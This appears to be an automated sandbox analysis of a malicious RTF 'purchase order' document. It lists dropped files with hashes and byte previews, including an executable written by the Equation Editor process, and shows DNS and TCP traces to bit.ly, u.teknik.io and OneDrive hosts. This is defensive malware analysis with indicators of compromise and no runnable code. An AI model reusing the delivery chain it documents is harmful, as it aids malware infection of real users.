Preview:	..@.A.p.J.n.b.S.m.E.I.k.B.Y.w.P.B.r.@.-.D.y.s.i.v.y.j.z.Z.m.o.I.e.C.P.i.F.<.e.h.&.&.0._.M.-.C._.g.-.-._.-.d.,.6.4.>.3.2.9.9.7.$.C.v.>.y.t.=.n.5.\|.:.%._.>.j.n.8.%.b.m.;.=.u...2.8..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6618253-1CF8-4E74-AA78-05F4F57053A0}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Cab78C9.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\Local\Temp\Tar78CA.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	152788
Entropy (8bit):	6.316654432555028
Encrypted:	false
SSDEEP:	1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
MD5:	64FEDADE4387A8B92C120B21EC61E394
SHA1:	15A2673209A41CCA2BC3ADE90537FE676010A962
SHA-256:	BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
SHA-512:	655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
Malicious:	false
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	4.477506521672235
Encrypted:	false
SSDEEP:	3:M16NKRAX6XDEd6lNC9KRAX6XDEd6lmX16NKRAX6XDEd6lv:M4NAAXwEAfC9AAXwEAvNAAXwEA1
MD5:	319E61C883692B7358D466E3AD6A8B01
SHA1:	5DD6A28A69BCFE9050F178FC3E0BA82E9E1E9CB9
SHA-256:	FA9F64C6A6A7A55D1C25A0431BD0AFA9D82CFD15920E1142CD63A282E8939A85
SHA-512:	2D17CE30A4187D7B32EB69A31BF983099AD433750B74183A4F7AE411EE419E669AF4EA8F0B0B1605144F875CB1B4D1CDA190C2AC01713F6A4752BAD17AB34313
Malicious:	false
Preview:	[doc]..purchase order_2242021.LNK=0..purchase order_2242021.LNK=0..[doc]..purchase order_2242021.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\purchase order_2242021.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:18 2020, mtime=Wed Aug 26 14:08:18 2020, atime=Wed Feb 24 20:06:36 2021, length=1797651, window=hide
Category:	dropped
Size (bytes):	2148
Entropy (8bit):	4.558495707581942
Encrypted:	false
SSDEEP:	48:8n/XT0ZVXb+2Cw4+Qh2n/XT0ZVXb+2Cw4+Q/:8n/XuVXbM+Qh2n/XuVXbM+Q/
MD5:	B17CF01EAFABBDBC92CA93B98A73A27E
SHA1:	226FEC551A3022DD9EC31C81D152DB512465853C
SHA-256:	6AE2076101B206082430CBC6AC9EE18396AB47F62953D9D24AB1C5A9E80E7C8B
SHA-512:	4FDDC21D95242B07FDB7038FB8CEC50E25274E09093ACD08CD9C4436B769938E290BD24A58E14F5833AB31C0C45D4F5C3176D3B5D12DB8402833292952FBD22F
Malicious:	false
Preview:	L..................F.... ....P.{...P.{...........n...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....~.2..n..XR. .PURCHA~1.DOC..b.......Q.y.Q.y...8.....................p.u.r.c.h.a.s.e. .o.r.d.e.r._.2.2.4.2.0.2.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop\purchase order_2242021.doc.1.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.p.u.r.c.h.a.s.e. .o.r.d.e.r._.2.2.4.2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......061544....

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\HDGNLTQS.txt Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	90
Entropy (8bit):	4.294724337284533
Encrypted:	false
SSDEEP:	3:jvdiE1C7i2JLJdvglvPRdWFYlS/n:kE1ki2JLTvgliFJn
MD5:	60C5107F8B85546339B0AF38B517DD85
SHA1:	4C7E105169D3E3C2608F917EEB0A76AC70247D7F
SHA-256:	14DDA52EF4808BBBF1D30E95609E89C4E36D030D772A128405B58AA1D8F0E965
SHA-512:	7F15E78260E2DC398DFCD0BD0054EBBF250193873B610BA668565DAA5DAA35C05EDE12696108DD019CEED954AFB5336B5674B1323D3C43AFC335ECE1EB767EFB
Malicious:	false
IE Cache URL:	bit.ly/
Preview:	_bit.l1oc6O-1f1018e00109e7d832-00p.bit.ly/.1536.1517611264.30906391.1555483204.30870257.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\JOHDAECH.txt Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	64
Entropy (8bit):	4.1123437507738325
Encrypted:	false
SSDEEP:	3:vpqMLJUQ2arRTTG4WT/nx3SyS/n:vEMWXo1TG4UJSpn
MD5:	52D117091370D78E57A45347984C82A7
SHA1:	B88EAFFA9FC3F0B37D88CA795DAB3F572EE601AF
SHA-256:	0BE8ADA46BA469AA2021090A2188B15F58BE7E1935353887AB6828EA482548F1
SHA-512:	16A12CDCE6B48FEF53897D51A9D16AE36DD22AA730404019765140069581EA30917B0711C148008286542CE0FF83E8F2949A7770D56591967781F67E2CCC202B
Malicious:	false
IE Cache URL:	live.com/
Preview:	wla42..live.com/.1536.3819446656.30871589.3600096691.30870257.*.

C:\Users\user\Desktop\~$rchase order_2242021.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\Public\69577.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	131072
Entropy (8bit):	4.79650156443488
Encrypted:	false
SSDEEP:	1536:HWWTwV4fVhuy/kysvxhG7NuX40vbyovaWm5vj2kht/uxVQwV4MjW:7wVUPsyChtX40Tyova75vj2mt/QqwV
MD5:	5D2D34449323C67BA1F5EC7561DF2204
SHA1:	A48C7F51DB44CA8A2B0240D9C57C1983AC5D75DD
SHA-256:	95A1FF3F5D08AC3D0DFE64300EEC668FA0C78BDB7DA395F1D91735C5A0AEF8A5
SHA-512:	28B4C6DF609084045F866686E559C7771B6455BC8FDE56942F9422265C6ED2ACFE12EF383C23225AD171D9D7BA22EFC9EF7137C069070812AF798EDAA8AE6D73
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 12%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L...n\RK.................P...................`....@..................................J.......................................R..(....p.....................................................................(... ....................................text...DF.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	6.29966086098654
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	purchase order_2242021.doc
File size:	1797651
MD5:	f0c779ec7573308d5c5bbf15762391d5
SHA1:	6934649699360c8cf7a0d8dee37c994082268054
SHA256:	fe38000650bb91c8e0d5aee0a0bff8136d849d58dc6f7d9f35d33788abd9a799
SHA512:	d4adf951d8c57f8a63c0a5f9cbbb8ba56fe6820669159e879e5d29e390571c57c651f3457df60ae85e4b40fedb1d3f870af333aa4e50ad136a4f027ebe1aeede
SSDEEP:	12288:VZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQgZQC:V////////////////////////o545h
File Content Preview:	{\rtf51437\page11419927264400464@ApJnbSmEIkBYwPBr@-DysivyjzZmoIeCPiF<eh&&0_M-C_g--_-d,64>32997$Cv>yt=n5\|:%_>jn8%bm\mklP;=u\m3699.28.... .... ...... .... .... ....

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	001A47FFh								no

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 24, 2021 13:06:50.302928925 CET	49167	80	192.168.2.22	67.199.248.11
Feb 24, 2021 13:06:50.315180063 CET	80	49167	67.199.248.11	192.168.2.22
Feb 24, 2021 13:06:50.315296888 CET	49167	80	192.168.2.22	67.199.248.11
Feb 24, 2021 13:06:50.315624952 CET	49167	80	192.168.2.22	67.199.248.11
Feb 24, 2021 13:06:50.327708006 CET	80	49167	67.199.248.11	192.168.2.22
Feb 24, 2021 13:06:50.422799110 CET	80	49167	67.199.248.11	192.168.2.22
Feb 24, 2021 13:06:50.422919989 CET	49167	80	192.168.2.22	67.199.248.11
Feb 24, 2021 13:06:50.496206045 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:50.531502962 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:50.531634092 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:50.541237116 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:50.578671932 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:50.578704119 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:50.578797102 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:50.592158079 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:50.628480911 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:50.628570080 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.005666018 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.139710903 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.847400904 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.847433090 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.847618103 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.847687006 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.847713947 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.847758055 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.847774029 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.847784996 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.847820044 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.848287106 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.848365068 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.848552942 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.848614931 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.848623037 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.848666906 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.848833084 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.848856926 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.848906994 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.848911047 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.848978996 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.849313974 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.849390984 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.849493027 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.849565029 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.855420113 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.882944107 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.882980108 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.882997036 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.883011103 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.883027077 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.883121967 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.883284092 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.883326054 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.883354902 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.883378029 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.883398056 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.883415937 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.883425951 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.883449078 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.883467913 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.883522034 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.883725882 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.883748055 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.883776903 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.883791924 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.883889914 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.883954048 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.883956909 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.884004116 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.884007931 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.884049892 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.884109974 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.884141922 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.884159088 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.884188890 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.884274960 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.884299040 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.884325027 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.884341002 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.884404898 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.884459972 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.884481907 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.884540081 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.885004997 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.885207891 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.885236025 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.885276079 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.885294914 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.918937922 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.918989897 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.919028044 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.919066906 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.919104099 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.919142008 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.919189930 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.919209957 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.919233084 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.919253111 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.919260025 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.919265032 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.919271946 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.919280052 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.919290066 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.919321060 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.919337034 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.919359922 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.919372082 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.919399023 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.919414997 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.919439077 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.919446945 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.919477940 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.919487000 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.919526100 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.919527054 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.919570923 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.919580936 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.919609070 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.919624090 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.919641018 CET	443	49168	5.79.72.163	192.168.2.22
Feb 24, 2021 13:06:52.919672012 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.919684887 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:52.920759916 CET	49168	443	192.168.2.22	5.79.72.163
Feb 24, 2021 13:06:53.242991924 CET	49167	80	192.168.2.22	67.199.248.11
Feb 24, 2021 13:06:53.243036032 CET	49168	443	192.168.2.22	5.79.72.163

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 24, 2021 13:06:50.275626898 CET	52197	53	192.168.2.22	8.8.8.8
Feb 24, 2021 13:06:50.288167953 CET	53	52197	8.8.8.8	192.168.2.22
Feb 24, 2021 13:06:50.472788095 CET	53099	53	192.168.2.22	8.8.8.8
Feb 24, 2021 13:06:50.494493961 CET	53	53099	8.8.8.8	192.168.2.22
Feb 24, 2021 13:06:50.935065031 CET	52838	53	192.168.2.22	8.8.8.8
Feb 24, 2021 13:06:50.947669029 CET	53	52838	8.8.8.8	192.168.2.22
Feb 24, 2021 13:06:50.951725006 CET	61200	53	192.168.2.22	8.8.8.8
Feb 24, 2021 13:06:50.964308977 CET	53	61200	8.8.8.8	192.168.2.22
Feb 24, 2021 13:06:51.469333887 CET	49548	53	192.168.2.22	8.8.8.8
Feb 24, 2021 13:06:51.487565041 CET	53	49548	8.8.8.8	192.168.2.22
Feb 24, 2021 13:06:51.490777969 CET	55627	53	192.168.2.22	8.8.8.8
Feb 24, 2021 13:06:51.503056049 CET	53	55627	8.8.8.8	192.168.2.22
Feb 24, 2021 13:08:14.036895037 CET	56009	53	192.168.2.22	8.8.8.8
Feb 24, 2021 13:08:14.049120903 CET	53	56009	8.8.8.8	192.168.2.22
Feb 24, 2021 13:08:15.175936937 CET	61865	53	192.168.2.22	8.8.8.8
Feb 24, 2021 13:08:15.239042044 CET	53	61865	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 24, 2021 13:06:50.275626898 CET	192.168.2.22	8.8.8.8	0x26d4	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)
Feb 24, 2021 13:06:50.472788095 CET	192.168.2.22	8.8.8.8	0x437e	Standard query (0)	u.teknik.io	A (IP address)	IN (0x0001)
Feb 24, 2021 13:08:14.036895037 CET	192.168.2.22	8.8.8.8	0x1e5e	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Feb 24, 2021 13:08:15.175936937 CET	192.168.2.22	8.8.8.8	0x60f4	Standard query (0)	cbzrfq.bl.files.1drv.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 24, 2021 13:06:50.288167953 CET	8.8.8.8	192.168.2.22	0x26d4	No error (0)	bit.ly		67.199.248.11	A (IP address)	IN (0x0001)
